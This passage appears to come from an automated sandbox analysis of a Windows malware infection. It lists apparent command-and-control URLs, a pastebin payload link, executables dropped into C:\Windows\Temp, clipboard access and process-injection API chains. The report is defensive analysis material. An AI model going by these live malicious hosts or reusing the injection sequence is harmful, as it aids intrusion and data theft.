                      Source: powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/
                      Source: aspnet_regiis.exe, 0000001A.00000003.2023661770.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023545300.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023355458.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/((
                      Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/9
                      Source: aspnet_regiis.exe, 0000001A.00000003.2023097227.0000000004CED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2044772844.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023545300.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2044842096.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023218177.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023355458.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2069923934.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028F1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2068537398.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api
                      Source: aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api7M
                      Source: aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2123496041.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apiV
                      Source: aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apibubM
                      Source: aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apis
                      Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/s
                      Source: aspnet_regiis.exe, 0000001A.00000003.2000438756.000000000296D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs:443/api
                      Source: powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000008.00000002.1745042704.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000022.00000002.2296676818.00000000079F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                      Source: powershell.exe, 00000022.00000002.2258625366.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.i
                      Source: powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000056B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005007000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                      Source: powershell.exe, 00000028.00000002.2374554287.0000000004C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country
                      Source: powershell.exe, 00000026.00000002.2353438766.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/countryhZ_l
                      Source: powershell.exe, 00000024.00000002.2276629852.00000000034C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip
                      Source: powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000056B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/iphZ_l
                      Source: powershell.exe, 00000008.00000002.1749981425.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1779208319.000000000567B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1903260944.000000000607A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1924834507.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2287144047.00000000063E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2326060060.00000000065C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2411478791.0000000005894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000011.00000002.1887480681.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005369000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.00000000051AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005164000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004796000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: powershell.exe, 00000013.00000002.1892104681.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/NQfY14gm
                      Source: powershell.exe, 00000013.00000002.1895365190.0000000000860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/nqfy14gm
                      Source: powershell.exe, 00000011.00000002.1885257880.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1930333354.0000000006BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/rawNQfY14gm
                      Source: aspnet_regiis.exe, 0000001A.00000003.1953259118.0000000002926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://revirepart.biz/
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                      Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: aspnet_regiis.exe, 0000001A.00000003.2023316255.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023048745.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D82000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: aspnet_regiis.exe, 0000001A.00000003.2023316255.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023048745.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D82000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.184.174:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49752 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49764 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49780 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49808 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49814 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D5300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,26_2_025D5300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D5300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,26_2_025D5300

                      System Summary

                      barindex
                      Source: zbjnkzvo4cc.exe.17.drStatic PE information: section name: m@ka
                      Source: mxtvcgq32fe.exe.19.drStatic PE information: section name: m@ka
                      Source: zbjnkzvo4cc.exe.17.drStatic PE information: section name:
                      Source: mxtvcgq32fe.exe.19.drStatic PE information: section name:
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\mxtvcgq32fe.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\zbjnkzvo4cc.exeJump to dropped file
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68BF88C0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,NtGetContextThread,CloseHandle,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,CloseHandle,24_2_68BF88C0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68BF6E40 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,24_2_68BF6E40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047F246F3_2_047F246F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9B246F3_2_6F9B246F
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_036EB4908_2_036EB490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_036E20358_2_036E2035
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04EF246F10_2_04EF246F
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68BF88C024_2_68BF88C0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68BF121024_2_68BF1210
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68BF6E4024_2_68BF6E40
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68BFFCB024_2_68BFFCB0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68BF481024_2_68BF4810
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C0A62124_2_68C0A621
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68BF7FE024_2_68BF7FE0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C4A4A024_2_68C4A4A0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C16CB024_2_68C16CB0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C3946024_2_68C39460
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C17C7024_2_68C17C70
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C1907024_2_68C19070
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C309F024_2_68C309F0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C5398024_2_68C53980
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C1B15024_2_68C1B150
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C1716024_2_68C17160
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C1397024_2_68C13970
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C19EE024_2_68C19EE0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C4AEE024_2_68C4AEE0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C4A24024_2_68C4A240
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C1925024_2_68C19250
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C3165024_2_68C31650
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C1D25224_2_68C1D252
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C4D66024_2_68C4D660
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C1EBD924_2_68C1EBD9
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C15FF024_2_68C15FF0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C5334024_2_68C53340
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C3276024_2_68C32760
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C4AB6024_2_68C4AB60
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C12F7024_2_68C12F70
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C4DB1024_2_68C4DB10
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C4BFD024_2_68C4BFD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DD26026_2_025DD260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A9AE026_2_025A9AE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DAAE026_2_025DAAE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CF3ED26_2_025CF3ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CE39826_2_025CE398
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C906026_2_025C9060
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C486026_2_025C4860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025B90D026_2_025B90D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C211026_2_025C2110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C661826_2_025C6618
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DA76026_2_025DA760
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025E2C4026_2_025E2C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A8C7026_2_025A8C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BA4DA26_2_025BA4DA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025AAD5026_2_025AAD50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025E358026_2_025E3580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C125026_2_025C1250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C5A4A26_2_025C5A4A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025E326026_2_025E3260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A620026_2_025A6200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A4A3126_2_025A4A31
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DE2D026_2_025DE2D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DDAC026_2_025DDAC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BE2F026_2_025BE2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D32F026_2_025D32F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025AB28026_2_025AB280
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D8B4C26_2_025D8B4C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A2B7026_2_025A2B70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C236026_2_025C2360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BBB1026_2_025BBB10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BEFF526_2_025BEFF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BFB2026_2_025BFB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C6BD026_2_025C6BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A5BF026_2_025A5BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BEBF026_2_025BEBF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D1BE826_2_025D1BE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025E13A026_2_025E13A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A787026_2_025A7870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025E186026_2_025E1860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C381526_2_025C3815
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CA0D526_2_025CA0D5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CB0FA26_2_025CB0FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D50F026_2_025D50F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BE0E826_2_025BE0E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A68B026_2_025A68B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DB0A026_2_025DB0A0
